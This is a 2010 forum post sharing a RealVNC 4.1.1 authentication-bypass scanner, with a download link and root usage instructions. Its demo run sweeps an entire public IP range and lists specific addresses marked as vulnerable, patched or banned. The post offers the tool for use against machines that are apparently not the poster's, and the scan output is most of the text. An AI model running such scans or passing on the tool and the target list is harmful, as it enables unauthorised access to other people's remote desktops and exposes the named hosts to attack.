VNC Authentication bypass

ghostdog · December 23, 2010, 08:36:11 PM

Ciao tutti
Hi there.

This a very useful VNC scanner that finds vulnerable 4.11 vnc servers.
Download Link : http://pentester.fr/resources/tools/techno/VNC/VNC_bypauth/VNC_bypauth-linux.tar.gz

Instructions:

Download and extract VNC_byauth in your Home Directory.

Usage: #./VNC_bypauth -p 5900 -i ( Ip range ) -vnc -vv ( as root )

DEMO : ghostdog@backbox:~$ sudo su
root@backbox:/home/ghostdog# ./VNC_bypauth -p 5900 -i 94.66.0.0-94.66.255.254 -vnc -vv

================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
====================================================[linux]==

FOUND PORT IP STATUS THREADS TOTAL/REMAINING
94.66.12.71 :5900 vnc4:patched
94.66.14.14 :5900 vnc4:patched
94.66.17.7 :5900 vnc4:patched
94.66.18.121 :5900 vnc4:vulnerable
94.66.19.130 :5900 vnc4:patched
94.66.22.120 :5900 vnc4:patched
94.66.19.183 :5900 vnc4:patched
94.66.22.226 :5900 not_vnc4:nothing received
94.66.40.133 :5900 vnc4:banned
94.66.44.153 :5900 vnc4:banned
94.66.46.148 :5900 vnc4:vulnerable
94.66.49.167 :5900 vnc4:patched
94.66.52.48 :5900 vnc4:banned
94.66.54.21 :5900 vnc4:banned
94.66.55.254 :5900 not_vnc4:nothing received
94.66.59.108 :5900 vnc4:banned
94.66.59.186 :5900 vnc4:patched
94.66.58.223 :5900 vnc4:nothing received
94.66.66.35 :5900 vnc4:patched
94.66.70.109 :5900 vnc4:patched
94.66.72.86 :5900 vnc4:patched
94.66.78.116 :5900 vnc4:banned
94.66.88.49 :5900 vnc4:patched
94.66.86.190 :5900 not_vnc4:nothing received
94.66.89.58 :5900 vnc4:banned
terminate called after throwing an instance of 'St9bad_alloc'18
what(): std::bad_alloc
Aborted P:23551 I:23551 S:35 % TH:380 0:04:03/0:07:18
root@backbox:/home/ghostdog#

Happy Hacking
GD